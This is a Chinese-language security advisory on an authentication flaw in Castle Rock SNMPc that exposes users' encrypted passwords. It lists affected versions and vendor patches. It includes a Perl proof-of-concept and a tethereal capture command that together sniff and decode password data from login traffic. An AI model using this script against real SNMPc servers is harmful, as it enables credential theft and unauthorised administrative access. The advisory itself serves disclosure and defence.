首页 -> 安全研究

安全研究

安全漏洞
Castle Rock Computing SNMPc v5/v6未授权远程访问漏洞

发布日期:2003-08-25
更新日期:2003-08-29

受影响系统:
Castle Rock Computing SNMPc 6.0.8
Castle Rock Computing SNMPc 6.0.5
Castle Rock Computing SNMPc 6.0
Castle Rock Computing SNMPc 5.1
不受影响系统:
Castle Rock Computing SNMPc 5.1.9
描述:
BUGTRAQ  ID: 8484

SNMPc是一款分布式网络管理系统,适合管理中小型网络。

SNMPc由于其弱验证协议实现,远程攻击者可以利用这个漏洞以超级用户权限访问SNMPc服务器。

SNMPc分布式系统包含多个组件,服务器组件执行集中化计算机和维护数据库,包括配配置,网络拓扑,事件日志文件和用户信息。用户必须启动远程登录控制台或JAVA控制台查看和控制SNMPc系统。不过远程控制使用的验证机制相当简单,所以验证基于客户端完成。在登录过程中,在几个初始化交换后远程控制台发送用户名到服务器,服务器就会发送包含在ntuserdb.dat文件中的用户数据如用户名,实际名,电话号码,用户组进行应答,也包含用户加密的密码信息。攻击者可以利用这个信息获得验证信息。

这个漏洞最终可使攻击者以超级用户权限访问SNMPc服务器。

<*来源:Alexander V. Nickolenko (sawny@multimedia.ru
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106194495921713&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Alexander V. Nickolenko (sawny@multimedia.ru)提供了如下测试方法:

#!/usr/bin/perl

$str='.YZ[\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-
./ !"#$%&\'................................................................................................................................';





while(<>){

  $s="";

  if(/^0130 /){

    GETIT: { do {

      s/^0130  00 00 // if /^0130/;

      s/^[[:xdigit:]]{4}  //;

      s/   .*$//ms;  

      $s=$s." ".$_;

      last GETIT if ($s =~ / 00/);

    }while (<>)  };

    $s=~s/ 00.*$//ms;

    $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1)
/ige;

    $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;

    print ":$s:\n";

  }

}

并使用如下命令获得用户的加密密码信息:

"C:\Program Files\Ethereal\tethereal.exe" -lnV port 165 | C:\cygwin\bin\perl.exe 0wn-snmpc.pl

建议:
厂商补丁:

Castle Rock Computing
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

SNMPc version 6.0:

http://www.castlerock.com/download/fix821_608.zip (vers 6.0.8)
http://www.castlerock.com/download/fix821_605.zip (vers 6.0.5)

SNMPc version 5.1:

http://www.castlerock.com/download/snmpc519.exe

浏览次数:3003
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障